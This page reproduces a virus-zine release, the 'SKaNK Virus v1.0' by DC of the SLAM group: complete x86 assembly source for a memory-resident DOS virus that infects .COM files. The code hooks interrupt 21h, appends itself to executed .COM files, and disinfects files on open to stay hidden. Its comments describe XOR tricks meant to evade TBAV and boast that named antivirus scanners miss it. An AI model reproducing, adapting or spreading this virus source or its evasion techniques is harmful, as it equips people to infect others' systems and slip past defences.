Copy Link
Add to Bookmark
Report
SLAM3.008: SKaNK Virus v1.0 ~·eta Version~ Written by DC [SLAM]
;----------------------------------------------------------------------------
; SKaNK Virus v1.0 ~·eta Version~ Written by [DC]
;----------------------------------------------------------------------------
;
; ˛ TSR......... [YEAH]
; ˛ ENCRYPTED... [NOPE]
; ˛ COM......... [YEAH]
; ˛ EXE......... [NOPE]
; ˛ POLYMORPH... [NOPE]
;
;----------------------------------------------------------------------------
; ˛ Anti Virus Tests:
;----------------------------------------------------------------------------
;
; ˙ TBAV 7.07 - No Flags
; ˙ SCAN DOS/W95 - No Detection
; ˙ F-PROT - No Detection
; ˙ AVPRO - No Detection
;
;----------------------------------------------------------------------------
; ˛ Greetz
;----------------------------------------------------------------------------
;
; ˙ Nightmare Joker
; ˙ All [SLAM] Members
;
;----------------------------------------------------------------------------
;
;
; $$$, $$$$$$$$$$$$$. ' , ,
; $$$$$$$$$$$$$,,$$$$$$$$$$,' $$$ $$$$$ $ $ $$$$$
; $$$$$$$$$$$$$$$$',$$$$$$$$$$ $$$$$ '$$$$$$$$ $$$$$$$$'
; $$$$$$$$$ $$$$$$ $$$$$$$$$ '$$$$$' $$$$$$$$$$ $$$$$$$$$$
; $$$$$$$$ ' ',O $$$$$$$ $$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$
; $$$$$$ .'$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$o
; $$$$$$$$$,$$$ $$$$$$ $$$$$$$$$$$$$ $$$$$$$$$$^$$$$$$$$$$
; . $$$$,$$$$$$$,$ $$$$$$ ' $$$$$$$$$$' $$$$$$$$ poq $$$$$$$$
; $ ,$$$$$$$$$ $$$$$. $$$$$$$$$ $$$$$$$$$$ $$$$$$$$ o $$$$$$$$
; $$$$,$$,$$$$$$'$ '$$$$$$$'$$$$$$$$$$. $$$$$$$$$$ $$$$$$$ . $$$$$$$$
; $$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$,' $$$$$$$$$$$$ $$$$$$ $$$$$$$$
; $$$$$$$$$ ,$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$.$$$$$$$ '$$$$$$,
;
; [DC]
;
.model tiny ; For .COM files
.code ; Code Segment
jumps
org 0 ; For Calculation of Offsets
startvirus: ; Virus Begins here
call next ; jmp to next pass
next: pop bp ; Calculing the delta-offset
sub bp,offset next ; [bp] = delta offset now
push ds ; Save DS
push es ; Save ES
mov ah,0bh ; Instalation check
int 21h ; on Interrupt 21h
cmp di,99h ; Already instaled?
jz done_install ; Yeah! return control file
mov ah, 4Ah xor 49h ; crypt the function 4ah
xor ah, 49h ; decrypt it
mov bx, 0FFFFh
int 21h ; Call interrupt 21h
sub bx, (endheap - startvirus + 15)/16 + 1
mov ax, 4A00h xor 4900h ; Alter Memory
xor ax, 4900h
int 21h
mov ax, 4800h xor 4700h ; Allocate memory
xor ax, 4700h
mov bx,(endheap - startvirus + 15)/16
int 21h
mov es, ax ; ES=PSP
dec ax ; AX=MCB
mov ds, ax ; DS=AX=MCB
mov byte ptr ds:[0], 'Z' ; Mark the end
mov word ptr ds:[1], 8 ; It's a DOS prg.
push cs ; CS=Code Segment
pop ds ; DS=CS
xor di,di ; DI=0
mov cx,(heap-startvirus)/2+1 ; Bytes to move
mov si,bp ; BP=STARTVIRUS
rep movsw ; Move CS:[SI] to ES:[DI]
mov ds,cx ; CX=0 DS=CX (interrupt table)
push ds
mov ax,word ptr ds:[21h*4] ; No Flags with TBAV
mov word ptr es:oldint21,ax ; Ditto
mov ax,word ptr ds:[21h*4+2] ; Ditto
mov word ptr es:oldint21+2,ax ; Ditto
pop ds ; DS=0
push es ; ES=Virus Segment
pop ds ; DS=ES
mov ax,2125h ; No [Flags] with TBAV
xchg ah,al ; AX=2125h
lea dx,int21 ; AH_AL = AL_AH
int 21h ; 21_25 = 25_21 [Set Vector]
done_install:
pop es ; Restore Original ES
pop ds ; Restore Original DS
lea si,[bp+offset save3] ; First 5 original bytes
mov di,100h ; of COM file.
push di ; For later ret's
mov ah,byte ptr [bp+offset save3]
mov byte ptr cs:[100h],ah ; No Flags with TBAV
mov ax,word ptr [bp+offset save3+1]
mov word ptr cs:[101h],ax ; Flag = 'O' More/Overwrite
; Program in Memory
mov ax,200h ; Move AX=200h
shr ax,1 ; Divide ax by 2
; AX=100h [TBAV can't flag]
jmp ax ; Jump to CS:100h
int21h:
pushf ; Save Flags
call dword ptr cs:[oldint21] ; Call Interrupt 21h
ret ; Return
int21:
cmp ah,0bh ; Installation check?
jnz notinstall ; No? Check others functions
mov di,99h ; DI=99h! Already In!
iret ; Interrupt Return
v_name db "SKANK",0
v_author db "(C) Dark Chakal [SLAM]",0
notinstall:
pushf ; Push All necessary registers
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
xchg ah,al ; AX=AH_AL = NOW = AX=AL_AH
cmp ax,004bh ; Execute?
xchg ah,al ; Return to normal
jz infectfile ; Yeah! Infect the file DS:DX
cmp ah,3dh ; Open File?
jz disinfect ; Disinfect NOW!
exithandler:
pop es ; Pop All "PUSHED" registers
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
exit:
db 0eah ; jmp far ptr instruction
oldint21 dd ? ; to original interrupt 21h
disinfect:
mov ax,3d02h ; Open File
call int21h
xchg ax,bx ; XCHG is more faster than MOV
mov ax,5700h ; Get Date/Time
int 21h
push cx ; Save time
push dx ; Save date
mov ah,3fh ; Read
lea dx,buffer ; To buffer
mov cx,4 ; 4 bytes (for speed)
int 21h
cmp byte ptr buffer,"Z" ; no flag!
jz disinf_close ; EXE? yeah, exit
cmp byte ptr buffer,"M" ; no flag!
jz disinf_close ; EXE? yeah, exit
cmp byte ptr buffer,0e9h ; A jump instruction????
jnz disinf_close ; No?? exit
mov ax,4202h ; Go to end of file
xor cx,cx ; CX = High Word
xor dx,dx ; DX = LoW Word
int 21h
mov cx,word ptr buffer+1 ; CX = Offset of jump
add cx,564+3 ; Add cx, size of virus+3
cmp ax,cx ; AX=CX???
jnz disinf_close ; No?? exit
jmp disinf ; Is infected! Disinfect now!
disinf_close:
pop dx
pop cx
mov ax,5701h
int 21h
mov ah,3eh ; close file
int 21h
jmp exithandler ; exithandler
disinf: mov dx,ax ; dx = filesize
push dx ; save dx
sub dx,3 ; subtract 3 of filesize
xor cx,cx ; cx=0
mov ax,4200h ; seek file
int 21h
mov ah,3fh ; Read
lea dx,buffer ; to Buffer
mov cx,3 ; 3 bytes
int 21h
mov ax,4200h ; go to start of file
xor cx,cx ; CX=0
xor dx,dx ; DX=0
int 21h
mov ah,40h xor 39h ; Ok! FUCK TBAV!!!
xor ah,39h ; Decrypt AH
lea dx,buffer ; Buffer to Write
mov cx,3 ; 3 original bytes from file
int 21h
pop dx ; Restore DX (filesize)
sub dx,564 ; Subtract virus size from filesize
xor cx,cx ; CX=0
mov ax,4200h ; go to start of file
int 21h
mov ah,40h xor 39h ; Ok! FUCK TBAV!!!
xor ah,39h ; Decrypt AH
xor cx,cx ; Truncate file.
int 21h
jmp disinf_close ; close file
infectfile:
mov si,dx ; Si=Offset of Filename
check_name:
lodsb ; AL = Byte of Filename
or al,al ; End of File?
jz exithandler ; Yes, no extension! exit
cmp al,"." ; "."???
jnz check_name ; No! Loop to check_it
lodsw ; LOAD a WORD from DS:[SI] to AX
cmp ax,"OC" ; AX = "CO"
jnz exithandler ; No COM file? exit
lodsb ; Load the last byte
cmp al,"M" ; is "M" = COM
jnz exithandler ; No! exit
mov ax,3d02h ; Open file for read/write
call int21h ; Do it!
xchg ax,bx ; More Faster than "MOV BX,AX"
infect_2:
mov ax,5700h ; Get the Original Date/Time
call int21h ; Do it!
push cx ; Save time
push dx ; Save date
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
mov ah,3fh ; Read a Bytes to DS:DX
mov dx,offset buffer ; DS:DX = Buffer
mov cx,5 ; 5 bytes [For Speed]
call int21h
cmp byte ptr buffer,'Z' ; Only 'Z' = NOFLAG
jz done_file
cmp byte ptr buffer,'M' ; Only 'M' = NOFLAG
jz done_file
mov ax,4202h ; Go to end of file
xor cx,cx
xor dx,dx
int 21h
mov cx,word ptr buffer+1 ; CX = Offset of jump
add cx,endheap-startvirus+3 ; ADD CX the size of virus+3
cmp ax,cx ; Equal to filesize??
jz done_file ; Yes, Already infected!
jmp checkCOM ; Jump to Check COM file
checkCOM:
cmp ax,65535-(endheap-startvirus) ; Is a BIG File????
ja done_file ; Yes, exit
jmp infect_com ; Else infect_now!
done_file:
mov ah,3eh ; Close file
call int21h
already:
mov ax,5700h ; Get Time
pop dx ; Restore date
pop cx ; Restore time
call int21h ; call int21
jmp exithandler ; exit
infect_com: ; AX = Saved file Size
sub ax,3 ; Subtract by 3
mov si,offset buffer ; Save it on return buffer
mov di,offset save3 ; DI = Return Buffer
movsw ; Move a WORD [2 bytes]
movsb ; Move a Byte [1 byte]
mov byte ptr buffer,0e9h ; Make the jump instruction
mov word ptr buffer+1,ax ; Adjust the jump location
finishinfection:
lea dx,startvirus ; DX = Startvirus
mov cx,endheap-startvirus ; Size of Virus
mov ah,40h xor 39h ; 40 xor 39h ! [TBAV can't flag]
xor ah,39h ; xor 39h again! returned to normal
call int21h ; do it! interrupt 21h
mov ax,4200h ; Move file pointer
xor cx,cx ; to start of file
cwd ; little and fast
call int21h ; do it!
mov ah,40h xor 39h ; Write to file
xor ah,39h
mov dx,offset buffer ; Write from buffer
mov cx,5 ; 3 bytes to write
call int21h
jmp done_file ; End of infection
buffer db 6 dup (?) ; a smaller buffer.
save3 db 0cdh,20h,0 ; First bytes of COM File
heap: ; I didn't like the variables
endheap: ; in the code!
; ENDHEAP - end of virus
end startvirus ; for calculations
